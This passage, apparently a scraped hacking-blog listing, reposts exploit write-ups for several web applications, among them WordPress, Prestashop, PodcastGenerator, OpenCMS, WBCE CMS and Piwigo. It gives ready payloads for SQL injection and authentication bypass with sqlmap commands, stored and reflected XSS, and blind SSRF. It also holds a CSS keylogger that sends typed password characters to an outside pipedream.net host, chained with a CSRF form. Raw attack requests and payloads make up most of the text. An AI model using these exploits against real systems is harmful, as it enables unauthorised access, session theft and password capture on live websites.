    # Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi # Date: 30/06/2023 # Exploit Author: Matin nouriyan (matitanium) # Version: <= 1.0.4 # CVE: CVE-2022-4297 Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/ # Tested on: Kali linux --------------------------------------- The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users, leading to an unauthenticated SQL injection -------------------------------------- How to Reproduce this Vulnerability: 1. Install WP AutoComplete <= 1.0.4 2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests 3. Find requests belong to WP AutoComplete like step 5 4. Start sqlmap and exploit 5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q
  18. HireHackking

    GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS) # Date: 30/06/2023 # Exploit Author: CraCkEr # Vendor: GZ Scripts # Vendor Homepage: https://gzscripts.com/ # Software Link: https://gzscripts.com/gz-forum-script.html # Version: 1.8 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Release Notes: Reflected XSS: The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Stored XSS Allow Attacker to inject malicious code into website, give ability to steal sensitive information, manipulate data, and launch additional attacks. ## Reflected XSS Path: /preview.php GET 'catid' parameter is vulnerable to RXSS http://www.website/preview.php?controller=Load&action=index&catid=moztj%22%3e%3cscript%3ealert(1)%3c%2fscript%3ems3ea&down_up=a Path: /preview.php GET 'topicid' parameter is vulnerable to RXSS http://www.website/preview.php?controller=Load&action=topic&topicid=1wgaff%22%3e%3cscript%3ealert(1)%3c%2fscript%3exdhk2 ## Stored XSS ----------------------------------------------- POST /GZForumScript/preview.php?controller=Load&action=start_new_topic HTTP/1.1 -----------------------------39829578812616571248381709325 Content-Disposition: form-data; name="free_name" <script>alert(1)</script> -----------------------------39829578812616571248381709325 Content-Disposition: form-data; name="topic" <script>alert(1)</script> -----------------------------39829578812616571248381709325 Content-Disposition: form-data; name="topic_message" <script>alert(1)</script> -----------------------------39829578812616571248381709325-- ----------------------------------------------- POST parameter 'free_name' is vulnerable to XSS POST parameter 'topic' is vulnerable to XSS POST parameter 'topic_message' is vulnerable to XSS ## Steps to Reproduce: 1. As a [Guest User] Click on [New Topic] to create a "New Topic" on this Path (http://website/preview.php?controller=Load&action=start_new_topic) 2. Inject your [XSS Payload] in "Name" 3. Inject your [XSS Payload] in "Topic Title " 4. Inject your [XSS Payload] in "Topic Message" 5. Submit 4. XSS Fired on Visitor Browser's when they Visit the Topic you Infect your [XSS Payload] on 5. XSS Fired on ADMIN Browser when he visit [Dashboard] in Administration Panel on this Path (https://website/GzAdmin/dashboard) 6. XSS Fired on ADMIN Browser when he visit [Topic] & [All Topics] to check [New Topics] on this Path (https://website/GzTopic/index)
  19. HireHackking

    Prestashop 8.0.4 - Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Prestashop 8.0.4 - Cross-Site Scripting (XSS) Application: prestashop Version: 8.0.4 Bugs: Stored XSS Technology: PHP Vendor URL: https://prestashop.com/ Software Link: https://prestashop.com/prestashop-edition-basic/ Date of found: 30.06.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Go to Catalog => Products 2. Select arbitary product 2. upload malicious svg file svg file content ===> <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> poc request: POST /admin253irhit4jjbd9gurze/filemanager/upload.php HTTP/1.1 Host: localhost Content-Length: 756 sec-ch-ua: sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzp0EwYSQ0YSV2sCZ Accept: application/json Cache-Control: no-cache X-Requested-With: XMLHttpRequest sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/admin253irhit4jjbd9gurze/filemanager/dialog.php?type=1&descending=false&sort_by=&lang=en Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=jcsq33e9kk7sk5m3bssjvhhggt; PrestaShop-c1c78947c88162eb206771df4a41c662=def502004dd8c2a1335b9be53c804392b0a2c75cff9bdb5c19cd61a5607c418b0f035c998ecf5b54c45e92f99c4e4e01cfab3d0af19e89f664379d034eef9fb26cda14713d019a4c3be8322c0f43be6eee245f9ab58a590058989b65701b1894d2a6857c3a6f542b71501ea0d8695e3642ec9a317c99be7a752cbf54a31af3eb042f935dbfb7586d53e0c1cc72d965c806e666b150a3f5ca5327512a5577ab2d4038a0fc521f9c4092b5f7bcd031fb09250d825bfa0d3b68e8f0329bf725bcd2565aa0997c4f352d0f156cd3b5fa922de6a77f46eb1dae7dbac79b172597d56d3f842b91d25354e597c14c618ffb5efa795611ffb3e04cedbeb33d6d8cc0da28ac1a432a8a310c18a1a449568a7aa66c744379e23be16563e8ff26b5cd8694c1e7fe43344710a55677527c7f90348e6daf7d438827b3ad748e99afe6842a508b14dc754fecfc5d0706869b34a9dd7630b12694c5ed865ccacacb9b05d58d6d92; PrestaShop-8edfcba6bf6b77ff3bb3d94e0228b048=def50200a47caf7b8d80335ae708e2f3182075135ab6b23986be859d96bde645e28f7b847b9dd1947867a8d1a976e10bb88d799f690ed85266f0515212c75d60115e5998f3bd6d69df4038125dbe6a3df081ea53a363959d276aa046f958ad7f100b252e6305ab0a36808ef58868ab8bf11e941729eca845709d45578deac87d18771aeb7b93dc1652344a89b5223994c68dc5f72f137d7d41708ade1916630e768b005ea48bb063db2de8a4e93bb8142c5206c73a72c33bcace8bcc7a0f9d9ba713590261f8ddee4692955709b631566c1097acf6766a1daa41e44b497834da8685e2156b0fe90abd0c0b47d24db358a7440c1469394ac302c800a01366b463aba2957206f8b09a43d9d1fc5f524a4e77d7a6ca7d09d60c9aa1ee155262e02267260abec3ca148d5a20d1d4a3a50c8d4abcaefae11d4503f7e5e72ee766b53507603e7a7573cabd45f7a56208658e00d5230f2e4b4bf1c8a45afa0de3a96883723fedf705ff1a96bbf6ac80fdcde5a9631148b7b9356bc4904774d705e0986081c7609c64f0f11c0f5f2b8d10a578db400373c02e333252ec319d517b92f01479a39b2bde7826b488e1ba64613c485146fc3d130e0da627672409b11210976cb8bbe70312cbc94a9bddceec917ee633efdd241fcfc2106a0a49cc7bdeb13928786bad26a00b9cc78c08e5e6ff55 Connection: close ------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ Content-Disposition: form-data; name="path" ------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ Content-Disposition: form-data; name="path_thumb" ------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ Content-Disposition: form-data; name="file"; filename="malas.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> ------WebKitFormBoundaryzp0EwYSQ0YSV2sCZ--
  20. HireHackking

    PodcastGenerator 3.2.9 - Blind SSRF via XML Injection

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: PodcastGenerator 3.2.9 - Blind SSRF via XML Injection #Application: PodcastGenerator #Version: v3.2.9 #Bugs: Blind SSRF via XML Injection #Technology: PHP #Vendor URL: https://podcastgenerator.net/ #Software Link: https://github.com/PodcastGenerator/PodcastGenerator #Date of found: 01-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Go to 'Upload New Episodes' (http://localhost/PodcastGenerator/admin/episodes_upload.php) 2. Fill all section and Short Description section set as 'test]]></shortdescPG><imgPG path="">( example :Attacker domain)http://localhost:3132</imgPG><shortdescPG><![CDATA[test' payload: test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test By the way i used localhost.If you have domain, you can use domain. 3.And upload episodes 4. I am listening on port 3132 because I'm observating for incoming requests nc -lvp 3132 5. And I receive request request: POST /PodcastGenerator/admin/episodes_upload.php HTTP/1.1 Host: localhost Content-Length: 101563 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypRUTcUa48pmEcI6Q User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/PodcastGenerator/admin/episodes_upload.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=rsvvc28on2q91ael2fiou3nad3 Connection: close ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="file"; filename="2023-07-01_2023-07-01_2023-07-01_4_photo-1575936123452-b67c3203c357_1_ (2).jpeg" Content-Type: image/jpeg image content blaaahblahasdfjblaaah;sdfblaaahasdf asdfasdfadddblaaahdblaaahddddblaaahddddddblaaahblaaahblaaahdddblaaahddddblaaahdblaaahddblaaahdddddblaaahddddddddddd ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="title" test ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="shortdesc" test]]></shortdescPG><imgPG path="">http://localhost:3132</imgPG><shortdescPG><![CDATA[test ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="date" 2023-07-01 ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="time" 17:02 ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="episodecover"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="longdesc" test ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="episodenum" 33 ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="seasonnum" 33 ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="itunesKeywords" ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="explicit" no ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="authorname" ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="authoremail" ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="customtags" ------WebKitFormBoundarypRUTcUa48pmEcI6Q Content-Disposition: form-data; name="token" vdzM0jc75uLMHV7ovxew8Dawh5mnWSpz ------WebKitFormBoundarypRUTcUa48pmEcI6Q--
  21. HireHackking

    Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS) # Date: 1/07/2023 # Exploit Author: tmrswrr # Vendor Homepage: http://www.opencms.org # Software Link: https://github.com/alkacon/opencms-core # Version: v15.0 POC: 1 ) Login in demo page , go to this url https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/.galleries/livedemo/!! 2 ) Click /.galleries/ , after right click any png file , open gallery, write in search button this payload <img src=. onerror=alert(document.domain)> 3 ) You will be see alert box POC: 1 ) Go to this url , right click any png file, rename title section and write your payload : <img src=. onerror=alert(document.domain)> https://demo.opencms.org/workplace#!explorer/8b72b2fe-180f-11ee-b326-0242ac11002b!!/sites/livedemo!!/230701/ld_go87op3bfy/.galleries/images/!! 2 ) You will be see alert box , stored xss POC: 1 ) Go to this url , right click any png file and choose replace , click change file and choose your svg file after save it svg file: <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert("XSS"); </script> </svg> 2 ) When click this svg file you will be see alert button
  22. HireHackking

    Beauty Salon Management System v1.0 - SQLi

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Beauty Salon Management System v1.0 - SQLi # Date of found: 04/07/2023 # Exploit Author: Fatih Nacar # Version: V1.0 # Tested on: Windows 10 # Vendor Homepage: https://www.campcodes.com <https://www.campcodes.com/projects/retro-cellphone-online-store-an-e-commerce-project-in-php-mysqli/> # Software Link: https://www.campcodes.com/projects/beauty-salon-management-system-in-php-and-mysqli/ # CWE: CWE-89 Vulnerability Description - Beauty Salon Management System: V1.0, developed by Campcodes, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate login authentication with the SQL queries and bypass authentication. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system. Steps to Reproduce - The following steps outline the exploitation of the SQL Injection vulnerability in Beauty Salon Management System V1.0: 1. Open the admin login page by accessing the URL: http://localhost/Chic%20Beauty%20Salon%20System/admin/index.php 2. In the username and password fields, insert the following SQL Injection payload shown inside brackets to bypass authentication for usename parameter: {Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374 ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign In} 3.Execute the SQL Injection payload. As a result of successful exploitation, the attacker gains unauthorized access to the system and is logged in with administrative privileges. Sqlmap results: POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y sqlmap identified the following injection point(s) with a total of 793 HTTP(s) requests: --- Parameter: username (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: username=admin' AND 6374=(SELECT (CASE WHEN (6374=6374) THEN 6374 ELSE (SELECT 6483 UNION SELECT 1671) END))-- vqBh&password=test&login=Sign In Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=admin' AND (SELECT 1468 FROM (SELECT(SLEEP(5)))qZVk)-- rvYF&password=test&login=Sign In --- [15:58:56] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.2.4, Apache 2.4.56 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
  23. HireHackking

    Car Rental Script 1.8 - Stored Cross-site scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Car Rental Script 1.8 - Stored Cross-site scripting (XSS) # Date: 30/07/2023 # Exploit Author: CraCkEr # Vendor: GZ Scripts # Vendor Homepage: https://gzscripts.com/ # Software Link: https://gzscripts.com/car-rental-php-script.html # Version: 1.8 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site Release Notes: Allow Attacker to inject malicious code into website, give ability to steal sensitive information, manipulate data, and launch additional attacks. ## Stored XSS ----------------------------------------------- POST /EventBookingCalendar/load.php?controller=GzFront&action=checkout&cid=1&layout=calendar&show_header=T&local=3 HTTP/1.1 payment_method=pay_arrival&event_prices%5B51%5D=1&event_prices%5B50%5D=1&event_prices%5B49%5D=1&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload&phone=[XSS Payload&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload&additional=xxx&captcha=qqxshj&terms=1&event_id=17&create_booking=1 ----------------------------------------------- POST parameter 'first_name' is vulnerable to XSS POST parameter 'second_name' is vulnerable to XSS POST parameter 'phone' is vulnerable to XSS POST parameter 'address_1' is vulnerable to XSS POST parameter 'country' is vulnerable to XSS ## Steps to Reproduce: 1. As a [Guest User] Select any [Pickup/Return Location] & Choose any [Time] & [Rental Age] - Then Click on [Search for rent a car] - Select Any Car 2. Inject your [XSS Payload] in "First Name" 3. Inject your [XSS Payload] in "Last Name" 4. Inject your [XSS Payload] in "Phone" 5. Inject your [XSS Payload] in "Address Line 1" 6. Inject your [XSS Payload] in "Country" 7. Accept with terms & Press [Booking] XSS Fired on Local User Browser. 8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard) XSS Will Fire and Executed on his Browser 9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index) XSS Will Fire and Executed on his Browser
  24. HireHackking

    WBCE CMS 1.6.1 - Open Redirect & CSRF

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: WBCE CMS 1.6.1 - Open Redirect & CSRF Version: 1.6.1 Bugs: Open Redirect + CSRF = CSS KEYLOGGING Technology: PHP Vendor URL: https://wbce-cms.org/ Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1 Date of found: 03-07-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== 1. Login to Account 2. Go to Media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/index.php#elf_l1_Lw) 3. Then you upload html file .(html file content is as below) ''' <html> <head> <title> Login </title> <style> input[type="password"][value*="q"]{ background-image: url('https://enflownwx6she.x.pipedream.net/q');} input[type="password"][value*="w"]{ background-image: url('https://enflownwx6she.x.pipedream.net/w');} input[type="password"][value*="e"]{ background-image: url('https://enflownwx6she.x.pipedream.net/e');} input[type="password"][value*="r"]{ background-image: url('https://enflownwx6she.x.pipedream.net/r');} input[type="password"][value*="t"]{ background-image: url('https://enflownwx6she.x.pipedream.net/t');} input[type="password"][value*="y"]{ background-image: url('https://enflownwx6she.x.pipedream.net/y');} input[type="password"][value*="u"]{ background-image: url('https://enflownwx6she.x.pipedream.net/u');} input[type="password"][value*="i"]{ background-image: url('https://enflownwx6she.x.pipedream.net/i');} input[type="password"][value*="o"]{ background-image: url('https://enflownwx6she.x.pipedream.net/o');} input[type="password"][value*="p"]{ background-image: url('https://enflownwx6she.x.pipedream.net/p');} input[type="password"][value*="a"]{ background-image: url('https://enflownwx6she.x.pipedream.net/a');} input[type="password"][value*="s"]{ background-image: url('https://enflownwx6she.x.pipedream.net/s');} input[type="password"][value*="d"]{ background-image: url('https://enflownwx6she.x.pipedream.net/d');} input[type="password"][value*="f"]{ background-image: url('https://enflownwx6she.x.pipedream.net/f');} input[type="password"][value*="g"]{ background-image: url('https://enflownwx6she.x.pipedream.net/g');} input[type="password"][value*="h"]{ background-image: url('https://enflownwx6she.x.pipedream.net/h');} input[type="password"][value*="j"]{ background-image: url('https://enflownwx6she.x.pipedream.net/j');} input[type="password"][value*="k"]{ background-image: url('https://enflownwx6she.x.pipedream.net/k');} input[type="password"][value*="l"]{ background-image: url('https://enflownwx6she.x.pipedream.net/l');} input[type="password"][value*="z"]{ background-image: url('https://enflownwx6she.x.pipedream.net/z');} input[type="password"][value*="x"]{ background-image: url('https://enflownwx6she.x.pipedream.net/x');} input[type="password"][value*="c"]{ background-image: url('https://enflownwx6she.x.pipedream.net/c');} input[type="password"][value*="v"]{ background-image: url('https://enflownwx6she.x.pipedream.net/v');} input[type="password"][value*="b"]{ background-image: url('https://enflownwx6she.x.pipedream.net/b');} input[type="password"][value*="n"]{ background-image: url('https://enflownwx6she.x.pipedream.net/n');} input[type="password"][value*="m"]{ background-image: url('https://enflownwx6she.x.pipedream.net/m');} input[type="password"][value*="Q"]{ background-image: url('https://enflownwx6she.x.pipedream.net/Q');} input[type="password"][value*="W"]{ background-image: url('https://enflownwx6she.x.pipedream.net/W');} input[type="password"][value*="E"]{ background-image: url('https://enflownwx6she.x.pipedream.net/E');} input[type="password"][value*="R"]{ background-image: url('https://enflownwx6she.x.pipedream.net/R');} input[type="password"][value*="T"]{ background-image: url('https://enflownwx6she.x.pipedream.net/T');} input[type="password"][value*="Y"]{ background-image: url('https://enflownwx6she.x.pipedream.net/Y');} input[type="password"][value*="U"]{ background-image: url('https://enflownwx6she.x.pipedream.net/U');} input[type="password"][value*="I"]{ background-image: url('https://enflownwx6she.x.pipedream.net/I');} input[type="password"][value*="O"]{ background-image: url('https://enflownwx6she.x.pipedream.net/O');} input[type="password"][value*="P"]{ background-image: url('https://enflownwx6she.x.pipedream.net/P');} input[type="password"][value*="A"]{ background-image: url('https://enflownwx6she.x.pipedream.net/A');} input[type="password"][value*="S"]{ background-image: url('https://enflownwx6she.x.pipedream.net/S');} input[type="password"][value*="D"]{ background-image: url('https://enflownwx6she.x.pipedream.net/D');} input[type="password"][value*="F"]{ background-image: url('https://enflownwx6she.x.pipedream.net/F');} input[type="password"][value*="G"]{ background-image: url('https://enflownwx6she.x.pipedream.net/G');} input[type="password"][value*="H"]{ background-image: url('https://enflownwx6she.x.pipedream.net/H');} input[type="password"][value*="J"]{ background-image: url('https://enflownwx6she.x.pipedream.net/J');} input[type="password"][value*="K"]{ background-image: url('https://enflownwx6she.x.pipedream.net/K');} input[type="password"][value*="L"]{ background-image: url('https://enflownwx6she.x.pipedream.net/L');} input[type="password"][value*="Z"]{ background-image: url('https://enflownwx6she.x.pipedream.net/Z');} input[type="password"][value*="X"]{ background-image: url('https://enflownwx6she.x.pipedream.net/X');} input[type="password"][value*="C"]{ background-image: url('https://enflownwx6she.x.pipedream.net/C');} input[type="password"][value*="V"]{ background-image: url('https://enflownwx6she.x.pipedream.net/V');} input[type="password"][value*="B"]{ background-image: url('https://enflownwx6she.x.pipedream.net/B');} input[type="password"][value*="N"]{ background-image: url('https://enflownwx6she.x.pipedream.net/N');} input[type="password"][value*="M"]{ background-image: url('https://enflownwx6she.x.pipedream.net/M');} input[type="password"][value*="1"]{ background-image: url('https://enflownwx6she.x.pipedream.net/1');} input[type="password"][value*="2"]{ background-image: url('https://enflownwx6she.x.pipedream.net/2');} input[type="password"][value*="3"]{ background-image: url('https://enflownwx6she.x.pipedream.net/3');} input[type="password"][value*="4"]{ background-image: url('https://enflownwx6she.x.pipedream.net/4');} input[type="password"][value*="5"]{ background-image: url('https://enflownwx6she.x.pipedream.net/5');} input[type="password"][value*="6"]{ background-image: url('https://enflownwx6she.x.pipedream.net/6');} input[type="password"][value*="7"]{ background-image: url('https://enflownwx6she.x.pipedream.net/7');} input[type="password"][value*="8"]{ background-image: url('https://enflownwx6she.x.pipedream.net/8');} input[type="password"][value*="9"]{ background-image: url('https://enflownwx6she.x.pipedream.net/9');} input[type="password"][value*="0"]{ background-image: url('https://enflownwx6she.x.pipedream.net/0');} input[type="password"][value*="-"]{ background-image: url('https://enflownwx6she.x.pipedream.net/-');} input[type="password"][value*="."]{ background-image: url('https://enflownwx6she.x.pipedream.net/.');} input[type="password"][value*="_"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%60');} input[type="password"][value*="@"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%40');} input[type="password"][value*="?"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3F');} input[type="password"][value*=">"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3E');} input[type="password"][value*="<"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3C');} input[type="password"][value*="="]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3D');} input[type="password"][value*=":"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3A');} input[type="password"][value*=";"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3B');} </style> </head> <body> <label>Please enter username and password</label> <br><br> Password:: <input type="password" /> <script> document.querySelector('input').addEventListener('keyup', (evt)=>{ evt.target.setAttribute('value', evt.target.value); }) </script> </body> </html> ''' 4.Then go to url of html file (http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html) and copy url. 5.Then you logout account and go to again login page (http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php) POST /WBCE_CMS-1.6.1/wbce/admin/login/index.php HTTP/1.1 Host: localhost Content-Length: 160 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uugg Connection: close url=&username_fieldname=username_3584B221EC89&password_fieldname=password_3584B221EC89&username_3584B221EC89=test&password_3584B221EC89=Hello123%21&submit=Login 6.If write as (https://ATTACKER.com) in url parameter on abowe request on you redirect to attacker.com. 7.We write to html files url url=http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html 8.And create csrf-poc with csrf.poc.generator <html> <title> This CSRF was found by miri </title> <body> <h1> CSRF POC </h1> <form action="http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="url" value="http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html" /> </form> <script>document.forms[0].submit();</script> </body> </html> 9.If victim click , ht redirect to html file and this page send to my server all keyboard activity of victim. Poc video : https://youtu.be/m-x_rYXTP9E
  25. HireHackking

    Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated) #Date: 25 June 2023 #Exploit Author: Okan Kurtulus #Vendor Homepage: https://piwigo.org #Version: 13.7.0 #Tested on: Ubuntu 22.04 #CVE : N/A # Proof of Concept: 1– Install the system through the website and log in with any user authorized to upload photos. 2– Click "Add" under "Photos" from the left menu. The photo you want to upload is selected and uploaded. 3– Click on the uploaded photo and the photo editing screen opens. XSS payload is entered in the "Description" section on this screen. After saving the file, go to the homepage and open the page with the photo. The XSS payload appears to be triggered. #Payload <sCriPt>alert(1);</sCriPt>